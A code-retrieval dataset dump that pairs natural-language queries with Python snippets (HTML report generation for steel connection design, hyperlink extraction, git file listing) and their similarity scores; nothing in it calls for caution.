\\\n + \"(&#8730;3)/1.25/1000 <br> \" + space(2) + \"= \" + shear_capacity\n elif is_hsfg == True:\n if bolt_hole_type == \"Standard\":\n K_h = str(1.0)\n elif bolt_hole_type == \"Oversized\":\n K_h = str(0.85)\n req_field = \"HSFG bolt shear capacity:\"\n # req_field += \"<br> <i>V</i><sub>dsf</sub> = mu_f*n_e*K_h*A_nb*f_0/<i>gamma<sub>mb</sub></i>\"\n req_field += \"<br> [cl. 10.3.3]\"\n prov_field = \"<i>V</i><sub>dsf</sub> = (\"\n prov_field += str(\n slip_factor_mu_f) + \")*(1)*(\" + K_h + \")*(\" + const + \"*\" + bolt_diameter + \"^2)<br>\" + space(2) + \\\n \"*(0.70*\" + bolt_fu + \")\" + \"/1.25/1000 <br> \" + space(2) + \"= \" + shear_capacity\n rstr += design_check_row(\"Bolt shear capacity (kN)\", req_field, prov_field, \" \")\n\n # Bolt bearing capacity (kN)\n # req_field = \"<i>V<sub>dpb</sub></i> = 2.5*k<sub>b</sub>*bolt_diameter*critical_thickness\" \\\n # +\"<br> *<i>f</i><sub>u</sub>/<i>gamma<sub>mb</sub></i><br> [Cl. 10.3.4]\"\n req_field = \"<i>V<sub>dpb</sub></i>:<br> [Cl. 
10.3.4]\"\n if is_hsfg == False:\n prov_field = \"<i>V</i><sub>dpb</sub> = 2.5*\" + kb + \"*\" + bolt_diameter + \"*\" + beam_w_t + \"*\" \\\n + beam_fu + \"/1.25/1000) <br>\" + space(2) + \" = \" + bearing_capacity + \" kN\"\n elif is_hsfg == True:\n prov_field = 'N/A'\n rstr += design_check_row(\"Bolt bearing capacity (kN)\", req_field, prov_field, \"\")\n\n # Bolt capacity (kN)\n req_field = \"min (bolt_shear_capacity, bolt_bearing_capacity)\"\n prov_field = \"min (\" + str(self.bolt_shear_capacity) + \", \" + str(self.bolt_bearing_capacity) + \") = \" \\\n + str(self.bolt_value)\n rstr += design_check_row(\"Bolt capacity (kN)\", req_field, prov_field, \"\")\n\n # No. of bolts\n # bolts = str(round(float(shear_force) / float(str(self.bolt_value)), 1))\n bolts_req_based_on_force = (math.ceil(float(shear_force) / self.bolt_value))\n if bolts_req_based_on_force > self.bolts_provided:\n remark = check_fail\n else:\n remark = check_pass\n # req_field = \"shear_force/ bolt_value = \" + str(shear_force) + \"/\" + str(self.bolt_value) + \" = \" \\\n req_field = str(shear_force) + \"/\" + str(self.bolt_value) + \" = \" \\\n + str(bolts_req_based_on_force)\n rstr += design_check_row(\"No. of bolts\", req_field, bolts_provided, remark)\n\n rstr += design_check_row(\"No. of columns\", \" \", number_of_cols, \" \")\n rstr += design_check_row(\"No. of row(s)\", \" &#8804; 2\", number_of_rows, \" \")\n\n # Bolt pitch (mm)\n if self.pitch >= self.min_pitch and self.pitch <= self.max_spacing:\n remark = check_pass\n # req_field = \" &#8805; 2.5*bolt_diameter ,<br> &#8804; min(32*thickness_governing_min, 300) \"\n req_field = \"<br> &#8805; 2.5* \" + bolt_diameter + \" = \" + str(self.min_pitch) + \",<br> &#8804; min(32*\" + \\\n str(self.thickness_governing_min) + \", 300) = \" + str(self.max_spacing) + \"<br> [cl. 10.2.2] <br>\"\n prov_field = pitch\n elif self.pitch < self.min_pitch or self.pitch > self.max_spacing:\n if self.num_rows == 1:\n remark = \" \"\n req_field = \"N/A\"\n prov_field = \"N/A\"\n else:\n remark = check_fail\n # req_field = \" &#8805; 2.5*bolt_diameter ,<br> &#8804; min(32*thickness_governing_min, 300)\"\n req_field = \"<br> &#8805; 2.5* \" + bolt_diameter + \" = \" + str(\n self.min_pitch) + \",<br> &#8804; min(32*\" + \\\n str(self.thickness_governing_min) + \", 300) = \" + str(self.max_spacing) + \"<br> [cl. 10.2.2] <br>\"\n prov_field = pitch\n rstr += design_check_row(\"Bolt pitch (mm)\", req_field, prov_field, remark)\n\n # Bolt gauge (mm)\n if self.gauge >= self.min_gauge and self.gauge <= self.max_spacing:\n remark = check_pass\n elif self.gauge < self.min_gauge or self.gauge > self.max_spacing:\n remark = check_fail\n # req_field = \" &#8805; 2.5*bolt_diameter ,<br> &#8804; min(32*thickness_governing_min, 300)\"\n req_field = \"<br> &#8805; 2.5*\" + bolt_diameter + \" = \" + str(self.min_gauge) + \",<br> &#8804; min(32*\" + \\\n str(self.thickness_governing_min) + \", 300) = \" + str(self.max_spacing) + \"<br> [cl. 10.2.2] <br>\"\n rstr += design_check_row(\"Bolt gauge (mm)\", req_field, gauge, remark)\n\n # End distance (mm)\n if self.end_dist >= self.min_end_dist:\n remark = check_pass\n elif self.end_dist < self.min_end_dist:\n remark = check_fail\n # req_field = \" &#8805;\" + str(self.min_edge_multiplier) + \"*bolt_hole_diameter\" + \" [cl. 
10.2.4.2]\"\n req_field = \"<br> &#8805;\" + str(self.min_edge_multiplier) + \"*\" + dia_hole + \" = \" + str(self.min_end_dist)\n rstr += design_check_row(\"End distance (mm)\", req_field, end, remark)\n\n # Edge distance (mm)\n if self.edge_dist >= self.min_edge_dist and self.edge_dist <= self.max_edge_dist:\n remark = check_pass\n elif self.edge_dist < self.min_edge_dist or self.edge_dist > self.max_edge_dist:\n remark = check_fail\n # req_field = \" &#8805;\" + str(self.min_edge_multiplier) + \"*bolt_hole_diameter,\"\n req_field = \" &#8805;\" + str(self.min_edge_multiplier) + \"*\" + dia_hole + \" = \" + str(self.min_edge_dist) + \" [cl. 10.2.4.2]<br>\"\n # Cl 10.2.4.3 if members are exposed to corrosive influences\n if is_environ_corrosive == \"Yes\":\n req_field += \"<br><br> As the members are exposed to corrosive influences: \"\n # req_field += \"<br> &#8804; min(12*thickness_governing_min*sqrt(250/f_y),<br>\" + space(\n # 2) + \" 40+4*thickness_governing_min)\"\n req_field += \"<br> [Cl 10.2.4.3]\"\n req_field += \"<br> &#8804; min(12*\" + str(self.thickness_governing_min) + \"*sqrt(250/\" \\\n + str(self.angle_fy) + \"), 40 + 4*\" + str(self.thickness_governing_min)\\\n + \") = \" + str(self.max_edge_dist)\n elif is_environ_corrosive == \"No\":\n # req_field += \"<br><br> &#8804; 12*thickness_governing_min*sqrt(250/f_y)\"\n req_field += \"<br> &#8804; 12*\" + str(self.thickness_governing_min) + \"sqrt(250/\" \\\n + str(self.angle_fy) + \") = \" + str(self.max_edge_dist) + \"[Cl 10.2.4.3]\"\n rstr += design_check_row(\"Edge distance (mm)\", req_field, edge, remark)\n\n # Seated angle\n rstr += design_check_row(\"Seated Angle \" + str(self.angle_sec), \"\", \"\", \"\", col_span=\"4\",\n text_one_css=\"detail\")\n\n # Seated angle length\n if connectivity == \"Column flange-Beam flange\":\n # req_field = \"= min(supported_beam_width,<br>\"+space(2)+\"supporting_column_width)\"\n req_field = \" <br> = min(\" + str(self.beam_w_f) + \", \" + str(self.column_w_f) + \")\"\n prov_field = str(self.angle_l)\n elif connectivity == \"Column web-Beam flange\":\n # limiting_angle_length = self.column_d - 2 * self.column_f_t - 2 * self.column_R1 - self.root_clearance_col\n # self.angle_l = int(math.ceil(min(self.beam_w_f, limiting_angle_length)))\n # req_field = \"= min(width of supported beam, <br>\" + space(2) + \\\n # \"column_depth - 2*column_flange_thickness<br>\" + space(2) +\\\n # \" - 2*column_R1 - root_clearance_col)\"\n req_field = \"<br> = min(\" + str(self.beam_w_f) \\\n + \", \" + str(self.column_d) + \" - 2*\" + str(self.column_f_t) \\\n + \" - 2*\" + str(self.column_R1) + \" - \" + str(self.root_clearance_col) + \")\"\n prov_field = str(self.angle_l)\n # As the seated angle length is a determined/calculated parameter, there is no design 'check' remark\n rstr += design_check_row(\"Length (mm)\", req_field, prov_field, \" \")\n\n # Length of outstanding leg\n if self.outstanding_leg_length_required < self.angle_B:\n remark = check_pass\n elif self.outstanding_leg_length_required > self.angle_B:\n remark = check_fail\n # req_field = \"b = (R*\" + sub(\"gamma\", \"m0\") + \"/(\" + sub(\"f\", \"yw\") +\\\n # \"*beam_web_thickness))<br>\" + space(2) + \"+ beam_column_clear_gap\"\n req_field = \"<br>[Cl. 
8.7.4]\"\n req_field += \"<br> = (\" + str(self.shear_force) + \"*1000*\" + str(self.gamma_m0) + \"/(\" + str(self.beam_fy) \\\n + \"*\" + str(self.beam_w_t) + \")) + \" + str(self.detail_gap)\n prov_field = str(self.angle_B)\n rstr += design_check_row(\"Outstanding leg length (mm)\", req_field, prov_field, remark)\n\n # For angle thickness\n # Shear capacity of outstanding leg\n if self.outstanding_leg_shear_capacity > self.shear_force:\n remark = check_pass\n elif self.outstanding_leg_shear_capacity < self.shear_force:\n remark = check_fail\n req_field = sub(\"V\", \"dp\") + \" &#8805 V <br>\"\n req_field += sub(\"V\", \"dp\") + \" &#8805 \" + str(self.shear_force) + \"kN <br> [Cl. 8.4.1]\"\n # prov_field = sub(\"V\", \"dp\") + \"=\" + sub(\"A\", \"v\") + sub(\"f\", \"yw\") + \"/ (&#8730 3 *\" + sub(\"gamma\", \"m0\") + \")\"\n prov_field = \"<br>\" + space(1) + \"= (\" + str(self.angle_l) + \"*\" + str(self.angle_t)\\\n + \")*\" + str(self.angle_fy) + \"/ (&#8730 3 *\" + str(self.gamma_m0)\\\n + \")<br>\" + space(1) + \"= \" + str(self.outstanding_leg_shear_capacity)\n rstr += design_check_row(\"Shear capacity of outstanding leg (kN)\", req_field, prov_field,\n remark)\n\n # Moment capacity of outstanding leg\n if self.is_shear_high == False:\n req_field = \"As V &#8804 0.6 \" + sub(\"V\", \"d\")\n req_field += \",<br>[Cl 8.2.1.2] is applicable <br>\"\n req_field += sub(\"M\", \"d\") + \" &#8805 Moment at root of angle\"\n req_field += \"<br>\" + sub(\"M\", \"d\") + \" &#8805 \" + str(self.moment_at_root_angle)\n prov_field = sub(\"M\", \"d\") + \" = min(\" + sub(\"beta\", \"b\") + sub(\"Z\", \"e\") + sub(\"f\", \"y\")\n prov_field += \"/\" + sub(\"gamma\", \"m0\") + \", <br>\" + space(1) +\\\n \" 1.5\" + sub(\"Z\", \"e\") + sub(\"f\",\"y\") + \"/\" + sub(\"gamma\", \"m0\") + \")\"\n prov_field += \"<br>\" + space(1) + \" = min(1.0* \" + str(self.angle_l) + \"*(\" + str(self.angle_t) + \"^2/6)*\"\n prov_field += str(self.angle_fy) + \"/\" + str(self.gamma_m0) + \",<br>\" + space(2) \\\n + \" 1.5*\" + str(self.angle_l) + \"*(\" + str(self.angle_t) + \"^2/6)*\"\n prov_field += str(self.angle_fy) + \"/\" + str(self.gamma_m0) + \")\"\n prov_field += \"<br>\" + space(1) + \"= \" + str(self.moment_capacity_angle)\n\n elif self.is_shear_high == True:\n req_field = \"As V &#8805 0.6 \" + sub(\"V\", \"d\")\n req_field += \",<br>[Cl 8.2.1.3] is applicable\"\n req_field += \"<br>\" + sub(\"M\", \"dv\") + \" &#8805 Moment at root of angle\"\n req_field += \"<br>\" + sub(\"M\", \"dv\") + \" &#8805 \" + str(self.moment_at_root_angle) + \"<br>\"\n prov_field = sub(\"M\", \"dv\") + \"= min((1 - beta)\" + sub(\"M\", \"d\") + \" , \"\n prov_field += \"1.2 \" + sub(\"Z\", \"e\") + sub(\"f\", \"y\") + \"/\" + sub(\"gamma\", \"m0\") + \") <br>\"\n prov_field += space(1) + \"where, <br>\" + space(2) + \"beta = ((2V/\" + sub(\"V\", \"d\")\\\n + \")-1)^2 = \" + str(round(self.moment_high_shear_beta, 4)) + \"<br>\"\n prov_field += \"<br>\" + sub(\"M\", \"dv\") + \" = \" + \"min((1 - \" + str(round(self.moment_high_shear_beta, 4))\\\n + \")<br>\" + space(1) + \"*1.0*(\" + str(self.angle_l) + \"*\" + str(self.angle_t) + \"^2/6)*\"\n prov_field += str(self.angle_fy) + \"/\" + str(self.gamma_m0) + \" , \"\n prov_field += \"<br>\" + space(1) + \"1.2*(\" + str(self.angle_l) + \"*\" + str(self.angle_t) + \"^2/6)*\"\n prov_field += str(self.angle_fy) + \"/\" + str(self.gamma_m0) + \")\"\n prov_field += \"<br>\" + space(1) + \" = \" + str(self.moment_capacity_angle)\n\n if self.moment_capacity_angle > 
self.moment_at_root_angle:\n remark = check_pass\n elif self.moment_capacity_angle < self.moment_at_root_angle:\n remark = check_fail\n rstr += design_check_row(\"Moment capacity of outstanding leg (kN-mm)\", req_field,\n prov_field, remark)\n\n # Top angle\n rstr += design_check_row(\"Top Angle\", \"\", \"\", \"\", col_span=\"4\", text_one_css=\"detail\")\n req_field = \"Recommended size (based on stability only): \" + str(self.top_angle_recommended)\n prov_field = \"User selected size: \" + str(self.top_angle)\n rstr += design_check_row(\"Section \", req_field, prov_field, \" \")\n\n # End distance (mm)\n if self.top_angle_end_dist_beam <= self.min_end_dist or \\\n self.top_angle_end_dist_column <= self.min_end_dist:\n remark = check_fail\n else:\n remark = check_pass\n req_field = \" &#8805;\" + str(self.min_edge_multiplier) + \"*bolt_hole_diameter\" + \" [cl. 10.2.4.2]\"\n req_field += \"<br> &#8805;\" + str(self.min_edge_multiplier) + \"*\" + dia_hole + \" = \" + str(self.min_end_dist)\n prov_field = \" on leg connected to Beam: \" + str(self.top_angle_end_dist_beam)\n prov_field += \"<br> on leg connected to Column: \" + str(self.top_angle_end_dist_column)\n rstr += design_check_row(\"End distance (mm)\", req_field, prov_field, remark)\n\n\n rstr += t('/table')\n rstr += t('h1 style=\"page-break-before:always\"')\n rstr += t('/h1')\n\n # -----------------------------------------------------------------------------------\n rstr += self.design_report_header()\n # -----------------------------------------------------------------------------------\n\n # Connection images (views)\n rstr += t('table width = 100% border-collapse= \"collapse\" border=\"1px solid black\"')\n\n # row = [0, \"Views\", \" \"]\n # rstr += t('tr')\n # rstr += t('td colspan=\"2\" class=\" detail\"') + space(row[0]) + row[1] + t('/td')\n # rstr += t('/tr')\n rstr += design_summary_row(0, \"Views\", \"detail\", col_span=\"2\")\n\n if self.safe is True:\n png = folder + \"/images_html/3D_Model.png\"\n datapng = '<object type=\"image/PNG\" data= %s width =\"450\"></object\">' % png\n\n side = folder + \"/images_html/seatSide.png\"\n dataside = '<object type=\"image/PNG\" data= %s width =\"400\"></object>' % side\n\n top = folder + \"/images_html/seatTop.png\"\n datatop = '<object type=\"image/PNG\" data= %s width =\"400\"></object>' % top\n\n front = folder + \"/images_html/seatFront.png\"\n datafront = '<object type=\"image/PNG\" data= %s width =\"450\"></object>' % front\n\n row = [0, datapng, datatop]\n rstr += t('tr') + nl()\n rstr += html_space(4) + t('td align=\"center\" class=\" header2\"') + space(row[0]) + row[1] + t('/td') + nl()\n rstr += html_space(4) + t('td align=\"center\" class=\" header2\"') + row[2] + t('/td') + nl()\n rstr += t('/tr' + nl())\n\n row = [0, dataside, datafront]\n rstr += t('tr') + nl()\n rstr += html_space(4) + t('td align=\"center\" class=\" header2\"') + space(row[0]) + row[1] + t('/td') + nl()\n rstr += html_space(4) + t('td align=\"center\" class=\" header2 \"') + row[2] + t('/td') + nl()\n rstr += t('/tr') + nl()\n\n else:\n pass\n\n rstr += t('/table') + nl() + \" \" + nl()\n rstr += t('h1 style=\"page-break-before:always\"')\n rstr += t('/h1')\n\n # -----------------------------------------------------------------------------------\n rstr += self.design_report_header()\n # -----------------------------------------------------------------------------------\n\n rstr += t('hr')\n rstr += t('/hr') + nl() + \" \" + nl()\n\n rstr += t('table width = 100% border-collapse= \"collapse\" 
border=\"1px solid black\"') + nl()\n rstr += html_space(1) + t('''col width=30%''')\n rstr += html_space(1) + t('''col width=70%''') + nl()\n\n rstr += html_space(1) + t('tr') + nl()\n row = [0, \"Additional Comments\", additional_comments]\n rstr += html_space(2) + t('td class= \"detail1\"') + space(row[0]) + row[1] + t('/td') + nl()\n rstr += html_space(2) + t('td class= \"detail2\" align=\"justified\"') + row[2] + t('/td') + nl()\n rstr += html_space(1) + t('/tr') + nl()\n\n rstr += t('/table') + nl()\n\n myfile.write(rstr)\n myfile.write(t('/body'))\n myfile.write(t('/html'))\n myfile.close()", "def save(self, path):\n f = open(path, 'w')\n f.write(self.content().encode('utf-8'))\n f.close()", "def save(self, path):\n (folder, filename) = os.path.split(path)\n (name, extension) = os.path.splitext(filename)\n\n if not name:\n raise ValueError, \"name is required\"\n\n path = os.path.join(folder, name + self.extension)\n f = open(path, \"wb\")\n f.write(self.contents)\n f.close()\n\n return path", "def write_output(directory, name, html):\n if not os.path.isdir(directory):\n os.mkdir(directory)\n with open(os.path.join(directory, '.'.join((name, 'html'))), 'w') as f:\n f.write(beautify(html))", "def write_html_file(out_table, outpath):\r\n page_out = PAGE_HTML % (outpath, out_table)\r\n out = open(outpath, \"w+\")\r\n out.write(page_out)\r\n out.close()", "def save_file(self, file_name, text):\n\n with open(file_name, 'w') as content_file:\n content = content_file.write(text)", "def write_html(self, filename):\n # todo: allow writing in split mode\n html = self.to_html()\n open(filename, 'wt').write(html)\n print('Exported app to %r' % filename)", "def save_file(self, filename):\r\n \r\n f = open(filename,'w')\r\n f.write(self.body)\r\n f.close" ]
[ "0.787979", "0.7703456", "0.769332", "0.76318324", "0.7469195", "0.7466598", "0.73435193", "0.7313832", "0.7297087", "0.72894686", "0.726079", "0.7140499", "0.6979866", "0.69742167", "0.6938493", "0.6927359", "0.6867596", "0.67674464", "0.6729367", "0.66805", "0.658196", "0.6538259", "0.6533741", "0.64887965", "0.6449", "0.64456385", "0.6409755", "0.64096415", "0.6373767", "0.6372479" ]
0.8745617
0
Extracts hyperlink from more anchor tag
def getPaginationHyperlink(html: str) -> str: moreLinkPattern = r'\<tr class="morespace".*?\<a\shref="(?P<hyperlink>.+?)"\sclass="morelink"' morelinkCompiledRegex = re.compile(moreLinkPattern, flags=re.IGNORECASE | re.DOTALL) matchedRegex = morelinkCompiledRegex.search(html) if matchedRegex: hyperlink = matchedRegex.group("hyperlink") return getCompleteUrl(hyperlink) else: return str()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def extract_next_page(parser):\n more = parser.find('a', class_='morelink')\n return more['href']", "def extract_next_page(parser):\n link = parser.find(\"a\", class_=\"morelink\")[\"href\"]\n return str(link)", "def _parse_links(self, response):\n links = []\n link_els = response.xpath(\n \"//div[contains(@class, 'right-col-block')]/h2[text() = 'Learn More']\"\n \"/following-sibling::*//a\"\n )\n for link_el in link_els:\n links.append(\n {\n \"href\": response.urljoin(link_el.attrib[\"href\"]),\n \"title\": link_el.xpath(\"./text()\").extract_first(),\n }\n )\n return links", "def extract_href_from_anchor(anchor):\n return find_text_between('href=\"','\">',anchor)", "def link_extract(link_text, content):\n h = html5lib.parse(content, namespaceHTMLElements=False)\n candidates = h.findall(\".//a[.='%s']\" % link_text)\n if not candidates:\n return 'NOT MATCHED'\n try:\n return candidates[0].attrib['href']\n except:\n return 'NOT MATCHED'", "def get_next_target(html):\n start_link = html.find('<a href=')\n if start_link == -1:\n return None, 0\n start_quote = html.find('\"', start_link)\n end_quote = html.find('\"', start_quote + 1)\n url = html[start_quote+1:end_quote]\n return url, end_quote", "def find_link(html_content):\n soup = BeautifulSoup(html_content, \"html.parser\")\n paragraphs = soup.find_all('p')\n for p in paragraphs:\n string = ''\n for element in p:\n if type(element) == bs4.element.NavigableString:\n string += element\n elif type(element) == bs4.element.Tag and element.name == 'a':\n if balanced_parenths(string):\n return element\n else:\n string += element.get_text()\n return None", "def parse_link(self,data,api):\n return REACT_API_DOCS_URL + data.FILE.split('/')[1] + api.find('a',attrs = {'class': 'hash-link'}).attrs['href']", "def get_next_target(page):\n\tstart_link = page.find('<a href=')\n\tif start_link == -1:\n\t\treturn None,0\n\turl_start = page.find('\"',start_link)\n\turl_end = page.find('\"',url_start+1)\n\turl= page[url_start+1:url_end]\n\treturn url, url_end", "def extract_url_from_anchor_tag(text):\n pattern = re.compile(r'(?<=href=\").*?(?=\")')\n matches = pattern.findall(text)\n return matches[0] if matches else ''", "def filter_url_parse_full_links(match):\n url = html.unescape(match.group(1))\n url = html.escape(url)\n punctuation = match.group(2)\n caption = filter_url_trim(url, filter_url_length)\n return '<a href=\"' + url + '\">' + caption + '</a>' + punctuation", "def parse_links(html):\n\n soup = BeautifulSoup(html, 'lxml')\n content_cards = soup.find_all('a', {'class': 'content-card-link'})\n review_links = [cc.get('href') for cc in content_cards]\n review_links = [review_link.split('/')[-1] for review_link in review_links]\n return review_links", "def _parse_links(self, response):\n links = []\n for link in response.css(\".row.mt-4 .list-unstyled a\"):\n links.append(\n {\n \"title\": \" \".join(link.css(\"*::text\").extract()).strip(),\n \"href\": response.urljoin(link.attrib[\"href\"]),\n }\n )\n return links", "def extract_link(self, page_url, element, attribute_name):\n attribute = element.attrs.get(attribute_name, None)\n if attribute is None:\n return None\n\n return urljoin(page_url, attribute, allow_fragments=False)", "def links_to_text(self):\r\n self.parser.stripTags(self.get_top_node(), 'a')", "def find_link_title(link_para):\n urls = []\n source_code = requests.get(link_para)\n plain_text = source_code.text\n parsed_html = BeautifulSoup(plain_text)\n for sub_link in parsed_html.find_all('a'):\n urls.append(sub_link.string)\n 
print urls", "def extract_url(td):\n url = td.find('a',href=True)['href']\n return url", "def show_more ( url, url_extern, info='Mehr ...' ) :\n return show_link ( url, info, url_extern )", "def _parse_links(self, item):\n regex = compile(r\"<a\\s+(?:[^>]*?\\s+)?href=([\\\"\\'])(.*?)\\1.*\\>(.*)<\\/a>\")\n links = [\n {\"href\": href, \"title\": title}\n for (_, href, title) in findall(regex, item[\"Event\"][\"Description\"])\n ]\n for link in links:\n if link[\"href\"][0] == \"/\":\n link[\"href\"] = \"https://www.pghschools.org\" + link[\"href\"]\n return links", "def extract_links(data):\n soup = BeautifulSoup(data)\n for link in soup.findAll(\"a\"):\n for pair in link.attrs:\n if pair[0] == u'href':\n yield pair[1]", "def filter_url_parse_partial_links(match):\n dname = html.unescape(match.group(1))\n dname = html.escape(dname)\n punctuation = match.group(2)\n caption = filter_url_trim(dname, filter_url_length)\n return '<a href=\"http://' + dname + '\">' + caption + '</a>' + punctuation", "def html_anchor_tags(self):\n return self.findall_markdown_cells(r'<a [^>]*>')", "def puxa_link(soup):\n link = []\n for item in soup.select('.listing-item__title'):\n link.append(item.a.get('href'))\n return link", "def extract_text(td):\n text = td.find('a',href=True).text\n return text", "def ref_to_link(txt):\n text = txt.group(1) # because it was a match in a regular expression\n\n thecite, everythingelse = first_bracketed_string(text)\n thecite = thecite[1:-1] # strip curly brackets\n thecite = thecite.replace(\"\\\\\",\"\") # \\href --> href\n\n refs = thecite.split(\",\")\n ans = \"\"\n\n # print \"refs\",refs\n\n for ref in refs:\n ref = ref.strip() # because \\cite{A, B, C,D} can have spaces\n this_link = \"\"\n if ref.startswith(\"href\"):\n the_link = re.sub(r\".*{([^}]+)}{.*\", r\"\\1\", ref)\n click_on = re.sub(r\".*}{([^}]+)}\\s*\", r\"\\1\", ref)\n this_link = '{{ LINK_EXT(\"' + click_on + '\",\"' + the_link + '\") | safe}}'\n elif ref.startswith(\"doi\"):\n ref = ref.replace(\":\",\"\") # could be doi:: or doi: or doi\n the_doi = ref[3:] # remove the \"doi\"\n this_link = '{{ LINK_EXT(\"' + the_doi + '\",\"https://doi.org/' + the_doi + '\")| safe }}'\n elif ref.lower().startswith(\"mr\"):\n ref = ref.replace(\":\",\"\")\n the_mr = ref[2:] # remove the \"MR\"\n this_link = '{{ LINK_EXT(\"' + 'MR:' + the_mr + '\", '\n this_link += '\"http://www.ams.org/mathscinet/search/publdoc.html?pg1=MR&s1='\n this_link += the_mr + '\") | safe}}'\n elif ref.lower().startswith(\"arxiv\"):\n ref = ref.replace(\":\",\"\")\n the_arx = ref[5:] # remove the \"arXiv\"\n this_link = '{{ LINK_EXT(\"' + 'arXiv:' + the_arx + '\", '\n this_link += '\"http://arxiv.org/abs/'\n this_link += the_arx + '\")| safe}}'\n\n\n if this_link:\n if ans:\n ans += \", \"\n ans += this_link\n\n return '[' + ans + ']' + everythingelse", "def grab_links(self):\n links = []\n link_char = []\n w_temp = [] #in template?\n par = [] #in parentheses?\n rtag = [] #in <ref> tag?\n dtag = [] #in <div> tag?\n\n skip_char = []\n\n for i, c in enumerate(self.article_xml):\n if i in skip_char: continue #eliminates double counting\n char = self.article_xml[i:i+2]\n tag = self.article_xml[i:i+4]\n \n #wiki template\n w_temp = self.inside_char(char, Article.w_marker, w_temp, i)\n if char in Article.w_marker: skip_char.append(i+1)\n if w_temp:\n continue #doesn't process if inside wiki template\n \n #parentheses\n par = self.inside_char(c, Article.par_marker, par, i)\n if par:\n continue\n \n #<ref> or <div>\n rtag = self.inside_char(tag, 
Article.rtag_marker, rtag, i)\n dtag = self.inside_char(tag, Article.dtag_marker, dtag, i)\n if rtag or dtag:\n continue\n \n #clear to add outer-most link\n if char == '[[':\n link_char.append(i)\n elif char == ']]' and len(link_char) == 1:\n links.append( self.article_xml[link_char[0]:i+2])\n link_char.pop()\n elif char == ']]' and len(link_char) > 1:\n link_char.pop()\n return links", "def getLinks(link):\n source = requests.get(link).text\n soup = BeautifulSoup(source, 'lxml')\n rows = soup.find_all(class_ = 'column-1') #select which column \n list_of_links = []\n \n for row in rows[1:]: #rows[1:] is used in case first row is a title row (ie there is no useful data here)\n name = row.find('a')\n link = name.attrs['href'] #the data I'm trying to extract\n list_of_links.append(link)\n return list_of_links", "def extractUrl(self, href):\n url = ''\n pattern = re.compile(r'(http[s]?://[^&]+)&', re.U | re.M)\n url_match = pattern.search(href)\n if(url_match and url_match.lastindex > 0):\n url = url_match.group(1)\n\n return url", "def parse_anchor(anchor):\n \n href = anchor.get(\"href\")\n content = anchor.text\n \n if href == None:\n href = ''\n \n if content == None:\n content == ''\n \n return href, content", "def DealUrlFirst(self, match, all_link):\n counter = 0\n for each_link in all_link:\n model_link = '<a href=\"(.*)\" class=\"c-3\">'\n break_link = '<a href=\"(.*)\" class=\"c-6\">'\n model_name = 'class=\"c-3\">(.*)</a>'\n if re.search(break_link, each_link):\n break\n result_link = re.findall(model_link, each_link)\n result_name = re.findall(model_name, each_link)\n# print len(result_link), len(result_name)\n if len(result_link) > 0:\n if len(result_name) > 0:\n print >> match, result_link[0]+' '+result_name[0]\n counter += 1\n print \"All the avaliable links is: \", counter" ]
[ "0.7142194", "0.6892841", "0.6824566", "0.66558737", "0.65821356", "0.6506589", "0.64602387", "0.62871546", "0.6197151", "0.61179537", "0.61167383", "0.6051518", "0.60359395", "0.6032119", "0.60204184", "0.60023904", "0.6000569", "0.5965327", "0.5958277", "0.595405", "0.59110785", "0.5902549", "0.58965117", "0.58941025", "0.58327085", "0.57936734", "0.5768031", "0.5747843", "0.5741024", "0.5731105" ]
0.74561816
0
Run ``git ls-files`` in the top-level project directory. Arguments go directly to the execution call.
def git_ls_files(*cmd_args): cmd = ['git', 'ls-files'] cmd.extend(cmd_args) return set(subprocess.check_output(cmd).splitlines())
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def git_ls_files():\n\tproc = subprocess.Popen(\n\t\t['git', 'ls-files'],\n\t\tstdin=subprocess.DEVNULL,\n\t\tstdout=subprocess.PIPE,\n\t\tstderr=None\n\t)\n\t(stdout, stderr) = proc.communicate()\n\tif proc.returncode != 0:\n\t\traise OSError(\"Cannot list version-controlled files\")\n\tfilenames = stdout.decode().split()\n\treturn list(filter(is_regular_file, filenames))", "def _ls(options, *files):\n if len(files) == 0:\n args = os.curdir\n else:\n args = ' '.join(files)\n subprocess.Popen('ls %s %s' % (options, args), shell=True)", "def ls(*files):\n _ls('-aF', *files)", "def git_callback(files): # type: (t.List[t.Tuple[str, str]]) -> None\n for dirpath, _dirnames, filenames in os.walk(os.path.join(data_context().content.root, '.git')):\n paths = [os.path.join(dirpath, filename) for filename in filenames]\n files.extend((path, os.path.relpath(path, data_context().content.root)) for path in paths)", "def do_ls(self, args):\n logger.debug(\"do_ls() was called\")\n \n parser = CrispyArgumentParser(description=self.do_ls.__doc__, prog=\"ls\")\n\n try:\n pargs = parser.parse_args(shlex.split(args))\n if pargs:\n print \"\\nDirectory listing:\\n===================\"\n for f in os.listdir(os.getcwd()):\n print \"{}\".format(f)\n fprint.success(\"Done.\")\n except MyParserException as e:\n print e", "def ll(*files):\n _ls('-alF', *files)", "def do_ls(argv):\n subprocess.call(\"ls\")", "def do_ls(self, args):\n if args:\n args = args.split()\n\n try:\n for file_name in self._qm.list_files(self._user):\n if not args:\n print(file_name)\n else:\n for a in args:\n if fnmatch.fnmatch(file_name, a):\n print(file_name)\n break\n except Exception, ex:\n print('ERROR:', ex, file=sys.stderr)", "def _find_git_files(dirname='', git_dir=None):\n file_list = []\n if git_dir is None:\n git_dir = pbr.git._run_git_functions()\n if git_dir:\n file_list = pbr.git._run_git_command(['ls-files', '-z'], git_dir)\n file_list += pbr.git._run_git_command(\n ['submodule', 'foreach', '--quiet', 'ls-files', '-z'],\n git_dir\n )\n # Users can fix utf8 issues locally with a single commit, so we are\n # strict here.\n file_list = file_list.split(b'\\x00'.decode('utf-8'))\n submodules = _get_submodules(git_dir)\n return [f for f in file_list if f and f not in submodules]", "def fs_ls(self, src):\n cmd = (\n \"import uos\\nfor f in uos.ilistdir(%s):\\n\"\n \" print('{:12} {}{}'.format(f[3]if len(f)>3 else 0,f[0],'/'if f[1]&0x4000 else ''))\"\n % ((\"'%s'\" % src) if src else \"\")\n )\n self.exec_(cmd, data_consumer=stdout_write_bytes)", "def get_files_from_git() -> Sequence[Path]:\n\n def get_files(cmd: str) -> Sequence[str]:\n output = subprocess.check_output(cmd, shell=True)\n return [os.fsdecode(x) for x in output.splitlines()]\n\n root = os.fsdecode(subprocess.check_output(\"git rev-parse --show-toplevel\", shell=True).strip())\n result: Set[str] = set()\n result.update(get_files(\"git diff --name-only --diff-filter=ACM --staged\"))\n result.update(get_files(\"git diff --name-only --diff-filter=ACM\"))\n result.update(get_files(\"git ls-files -o --full-name --exclude-standard\"))\n return 